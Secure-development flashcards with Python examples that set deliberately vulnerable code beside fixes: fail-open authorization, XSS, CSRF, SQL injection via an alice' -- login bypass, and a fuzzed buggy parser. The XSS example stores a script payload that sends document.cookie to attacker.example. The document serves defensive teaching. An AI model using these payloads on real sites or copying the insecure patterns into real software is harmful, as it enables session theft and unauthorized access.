Secure Development Flashcards

1
Q

What is Threat Modeling?

A

A structured process for identifying the threats a system faces, the assets and entry points they target, and the controls that mitigate them, so that security work (including which weaknesses to fix first) can be prioritized throughout the software development lifecycle

2
Q

When should security considerations be programmed into software?

A

At the very beginning of development

3
Q

What is the concept of least privilege?

A

Users and processes should be given the least amount of access necessary to perform a function

4
Q

What is defense in depth?

A

Layering of security controls

5
Q

Should you trust user input?

A

NO - all user input must be validated (preferably against an allowlist of what the application expects) and then encoded or escaped for the context in which it is used (HTML, SQL, shell, etc.)

6
Q

How would you minimize the attack surface when developing software?

A

Reduce the amount of code necessary, eliminate unneeded functionality and require authentication prior to running additional plugins

7
Q

What is a secure default?

A

Default configurations on a program that are inherently secure rather than requiring an administrator to add in the additional security

8
Q

Why should developers use code signing?

A

For authenticity and integrity purposes - a valid signature proves who published the code and that it has not been altered since it was signed

9
Q

What is meant by “Fail Securely?”

A

Applications should handle errors so that a failure leaves them in a secure (closed) state: an error must never grant access, skip a security check, or leak sensitive details, and it should not simply crash
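A worked example of the difference between failing open and failing closed, added here and not part of the original flashcards. The policy store, the roles, actions and resource names are constructed for illustration; the outage is simulated with a flag.

```python
"""Fail-open vs fail-closed authorization checks.

Added example, not from the original flashcards. The policy table, role and
resource names are made up, and the backend outage is simulated with a flag.
"""
import logging

log = logging.getLogger("authz")

# Constructed policy: (role, action, resource) -> allowed.
POLICY = {
    ("admin", "delete", "invoice"): True,
    ("clerk", "read", "invoice"): True,
}


class PolicyStoreError(Exception):
    """Raised when the policy backend cannot be reached (simulated outage)."""


def lookup_policy(role, action, resource, *, backend_up=True):
    """Simulated policy lookup; raises when the backend is 'down'."""
    if not backend_up:
        raise PolicyStoreError("policy store unreachable")
    return POLICY.get((role, action, resource), False)


def is_allowed_fail_open(role, action, resource, backend_up=True):
    """Insecure pattern: 'allowed' starts True and is only cleared when the
    lookup explicitly denies. An exception skips that assignment, so an outage
    silently grants access."""
    allowed = True
    try:
        if not lookup_policy(role, action, resource, backend_up=backend_up):
            allowed = False
    except PolicyStoreError as exc:
        log.error("policy lookup failed: %s", exc)  # logged, but still allowed
    return allowed


def is_allowed_fail_closed(role, action, resource, backend_up=True):
    """Secure pattern: deny by default. Only an explicit positive answer from
    the policy store grants access, and any error results in a denial."""
    try:
        return bool(lookup_policy(role, action, resource, backend_up=backend_up))
    except PolicyStoreError as exc:
        log.error("policy lookup failed, denying request: %s", exc)
        return False
```

Both versions agree while the backend is healthy; the difference only appears under failure, which is exactly when an attacker who can induce the failure (for example by exhausting the policy service) benefits from the fail-open version.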

10
Q

What is black box testing?

A

When a tester is not provided with any information about the program prior to conducting the test

11
Q

What is white box testing?

A

When a tester is given full information about the program (source code, design documents, credentials) prior to testing

12
Q

What is gray box testing?

A

A mixture of white and black box where some info is given

13
Q
  • Testing
  • Integration
  • Planning and Analysis
  • Maintenance
  • Deployment
  • Software Design
  • Implementation

Put these steps of the software development cycle in the correct order.

A
  1. Planning and Analysis
  2. Software/Systems Design
  3. Implementation
  4. Testing
  5. Deployment
  6. Maintenance
14
Q

What is SEH in secure software development?

A

Structured Exception Handling - provides control over what the app should do when it handles an error

15
Q

What is static analysis in SDLC?

A

Reviewing source code, manually or with automated tools, without running the program

16
Q

What is dynamic analysis in SDLC?

A

Analysis and testing of a program while executing or running it

17
Q

What is fuzzing in SDLC?

A

Feeding malformed, unexpected or random data into a program in an attempt to trigger crashes, hangs and other failures that reveal weaknesses

18
Q

What is a back door?

A

Code placed in programs that bypasses normal authentication and security mechanisms

19
Q

What is arbitrary code execution?

A

When an attacker is able to run code or commands of their own choosing on a victim's computer

20
Q

What is RCE?

A

Remote code execution - attacker is able to execute commands remotely

21
Q

Explain stored/persistent XSS

A

The attacker's malicious script is stored by the web server (for example in a comment, profile or forum post) and served to every victim who later views that page, so no victim has to click an attacker-supplied link

22
Q

Explain reflected XSS

A

When a malicious script is reflected off of a web application to the victim's browser. The script is delivered through a crafted link or request; the server includes the attacker's input unencoded in its response and the victim's browser executes it.

23
Q

Explain DOM-Based XSS

A

When the malicious payload is written into the page by client-side JavaScript (for example taken from the URL fragment, location.hash) rather than by the server, so the attack happens entirely in the victim's browser and may never reach the server or its logs
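A worked example of the server-side defence behind cards 5, 21 and 22 (validate on input, encode on output), added here and not taken from the original flashcards. The comment store, page template and attacker inputs are constructed for illustration. It does not cover DOM-based XSS (card 23): server-side encoding cannot help there, because the client-side script must itself write untrusted data with textContent rather than innerHTML.

```python
"""HTML output encoding as the defence against stored and reflected XSS.

Added example, not from the original flashcards. The comment store, the page
template and the attacker inputs are constructed for illustration.
"""
from html import escape

# Constructed "database" of user comments. The second one is a stored XSS
# payload: if it is ever rendered raw, it runs for every visitor of the page.
COMMENTS = [
    "Great article, thanks!",
    '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
]

# Constructed reflected payload that closes the value="..." attribute and adds
# an event handler; it only works if a raw double quote reaches the HTML.
ATTRIBUTE_BREAKOUT = '" onfocus="alert(1)" autofocus="'


def render_unsafe(search_term, comments=COMMENTS):
    """Vulnerable: untrusted strings are concatenated straight into HTML.
    The search term (reflected XSS) and the comments (stored XSS) both become
    markup the browser will execute."""
    items = "".join(f"<li>{c}</li>" for c in comments)
    return (f'<p>Results for "{search_term}"</p>'
            f'<input type="text" name="q" value="{search_term}">'
            f"<ul>{items}</ul>")


def render_safe(search_term, comments=COMMENTS):
    """Hardened: every untrusted value is escaped for the HTML context it lands
    in. quote=True also encodes ' and ", which is what stops an attacker from
    breaking out of the value="..." attribute."""
    term = escape(search_term, quote=True)
    items = "".join(f"<li>{escape(c, quote=True)}</li>" for c in comments)
    return (f'<p>Results for "{term}"</p>'
            f'<input type="text" name="q" value="{term}">'
            f"<ul>{items}</ul>")


def has_live_script(html):
    """Crude detector used by the test: an unescaped <script tag, or a raw
    quote followed by an event-handler attribute."""
    return "<script" in html or '" onfocus=' in html
```

Escaping is context-specific: html.escape is correct for element content and quoted attribute values, but data placed inside a <script> block, a URL or a CSS property needs the encoder for that context instead.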

24
Q

What is XSRF?

A

Cross Site Request Forgery - when an attacker causes a victim's browser to send a request to a site where the victim is already authenticated, so the site performs an action the victim never intended (the browser attaches the session cookie automatically)

25
Q

How would you prevent XSRF?

A

Anti-CSRF (synchronizer) tokens tied to the user's session and verified on every state-changing request, the SameSite cookie attribute, checking the Origin/Referer headers, and requiring re-authentication for sensitive actions
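A worked example of the synchronizer-token defence, added here and not part of the original flashcards. The in-memory session store, the /transfer action and the form layout are constructed for illustration; in this model the session id stands in for the session cookie the browser attaches to every request.

```python
"""Synchronizer-token defence against cross-site request forgery (XSRF).

Added example, not from the original flashcards. The session store, the
/transfer action and the form layout are constructed for illustration.
"""
import hmac
import secrets

# Constructed session store: session id -> session data. A real app keeps
# this server-side, keyed by the session cookie.
SESSIONS = {}


def login(user):
    """Create an authenticated session and mint an unguessable per-session
    CSRF token alongside it."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {
        "user": user,
        "csrf_token": secrets.token_urlsafe(32),
        "balance": 100,
    }
    return sid


def render_transfer_form(sid):
    """The legitimate page embeds the token in a hidden field. A page on
    another origin cannot read this HTML (same-origin policy), so a forged
    cross-site form cannot include the right value."""
    token = SESSIONS[sid]["csrf_token"]
    return (
        '<form method="post" action="/transfer">'
        f'<input type="hidden" name="csrf_token" value="{token}">'
        '<input name="amount"><button>Send</button></form>'
    )


def handle_transfer(sid, form, check_csrf=True):
    """Server-side handler for POST /transfer. `sid` plays the role of the
    session cookie, which the browser sends automatically and which therefore
    cannot by itself prove the user meant to send the request.
    Returns (status, balance). check_csrf=False shows the vulnerable version."""
    session = SESSIONS.get(sid)
    if session is None:
        return "unauthenticated", None
    if check_csrf:
        submitted = form.get("csrf_token", "")
        # Constant-time compare; a missing or foreign token fails the check.
        expected = session["csrf_token"]
        if not hmac.compare_digest(submitted.encode(), expected.encode()):
            return "csrf rejected", session["balance"]
    session["balance"] -= int(form["amount"])
    return "ok", session["balance"]
```

The token only works because it is never sent in a cookie: it travels in the form body, which an attacker's page cannot populate. Setting SameSite=Lax or Strict on the session cookie and checking the Origin header are cheap additional layers.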

26
Q

The process of removing redundant entries from a database is known as: sanitization or normalization

A

Normalization

28
Q

What are the countermeasures against SQL injection attacks?

A

Parameterized queries (prepared statements), input validation, stored procedures that do not build dynamic SQL internally, and least-privilege database accounts
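A worked example of a string-built login query beside its parameterized replacement, added here and not part of the original flashcards. The users table, the credentials and the attacker input are constructed for illustration; sqlite3 is used because it ships with Python (it has no stored procedures, so that countermeasure is not shown).

```python
"""SQL injection: string-built query vs parameterized query.

Added example, not from the original flashcards. The users table, the
credentials and the attacker input are constructed for illustration.
"""
import hashlib
import re
import sqlite3

# Allowlist for user names: letters, digits and underscore only (assumed policy).
USERNAME_RE = re.compile(r"[a-z0-9_]{1,32}")


def make_db():
    """In-memory database with one user. Plain SHA-256 is used here only to
    keep the example short; real systems use bcrypt/scrypt/argon2."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, pw_hash TEXT)")
    conn.execute(
        "INSERT INTO users VALUES (?, ?)",
        ("alice", hashlib.sha256(b"correct horse").hexdigest()),
    )
    return conn


def login_vulnerable(conn, name, password):
    """Builds the query with string formatting, so the user name is parsed as
    SQL. The name  alice' --  closes the string literal and comments out the
    password check, logging in as alice with any password."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    query = (f"SELECT name FROM users WHERE name = '{name}' "
             f"AND pw_hash = '{pw_hash}'")
    return conn.execute(query).fetchone() is not None


def login_safe(conn, name, password):
    """Input validation first, then a parameterized query: the driver binds
    the placeholders, so the input is only ever treated as data."""
    if not USERNAME_RE.fullmatch(name):
        return False
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT name FROM users WHERE name = ? AND pw_hash = ?",
        (name, pw_hash),
    ).fetchone()
    return row is not None
```

The parameterized query alone defeats the injection; the allowlist is the defence-in-depth layer from card 4, and it also keeps garbage out of the database and the logs.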

29
Q

A type of redundant source code producing an output not used anywhere in the application is commonly referred to as

A

Dead Code

30
Q

What term refers to virtualization at the application level?

A

Containerization

31
Q

What type of computing would be best suited for situations where response time in data processing is of critical importance?

A

Edge Computing

32
Q

The practice of finding vulnerabilities in an application by feeding it incorrect input is called:

A

Fuzzing
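A worked example of the technique behind cards 17 and 32: a minimal mutation fuzzer run against a parser that trusts its length field, and against the corrected parser. It is added here and is not part of the original flashcards; the record format, both parsers and the seed input are constructed for illustration.

```python
"""A minimal mutation fuzzer, a buggy length-prefixed record parser, and its fix.

Added example, not from the original flashcards. The record format
([len][payload...][xor checksum]) and the seed input are constructed.
"""
import random


def xor_all(buf: bytes) -> int:
    """XOR checksum over a byte string."""
    chk = 0
    for b in buf:
        chk ^= b
    return chk


def make_record(payload: bytes) -> bytes:
    """Build a well-formed record for use as the fuzzer's seed."""
    return bytes([len(payload)]) + payload + bytes([xor_all(payload)])


def parse_record_buggy(data: bytes) -> bytes:
    """Trusts the length byte. A length larger than the buffer (or a truncated
    buffer) makes the checksum index run off the end: IndexError here, an
    out-of-bounds read in C."""
    n = data[0]
    payload = data[1:1 + n]
    if data[1 + n] != xor_all(payload):  # index is never bounds-checked
        raise ValueError("bad checksum")
    return payload


def parse_record_fixed(data: bytes) -> bytes:
    """Validates every untrusted field before using it, and rejects bad input
    with the documented ValueError instead of failing unpredictably."""
    if len(data) < 2:
        raise ValueError("truncated record")
    n = data[0]
    if len(data) != n + 2:
        raise ValueError("length field does not match buffer")
    payload = data[1:1 + n]
    if data[1 + n] != xor_all(payload):
        raise ValueError("bad checksum")
    return payload


def mutate(rng: random.Random, data: bytes) -> bytes:
    """One random mutation: overwrite a byte, insert a byte, or delete a byte."""
    buf = bytearray(data)
    choice = rng.randrange(3)
    if choice == 0 and buf:
        buf[rng.randrange(len(buf))] = rng.randrange(256)
    elif choice == 1:
        buf.insert(rng.randrange(len(buf) + 1), rng.randrange(256))
    elif buf:
        del buf[rng.randrange(len(buf))]
    return bytes(buf)


def fuzz(parser, seed_input: bytes, iterations: int = 2000, seed: int = 1):
    """Feed mutated inputs to `parser`. The parser's documented rejection
    (ValueError) is expected; any other exception is a crash, and the input
    that caused it is returned for reproduction. Returns None if none found."""
    rng = random.Random(seed)
    for _ in range(iterations):
        candidate = mutate(rng, seed_input)
        try:
            parser(candidate)
        except ValueError:
            continue
        except Exception:
            return candidate
    return None
```

The fixed seed makes a crash reproducible, which is what you want when the finding goes into a bug report; real fuzzers (AFL++, libFuzzer) add coverage feedback so that inputs reaching new code paths are kept and mutated further.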

33
Q

What is an automated or manual code review process aimed at discovering logic and syntax errors in the application's source code?

A

Static Analysis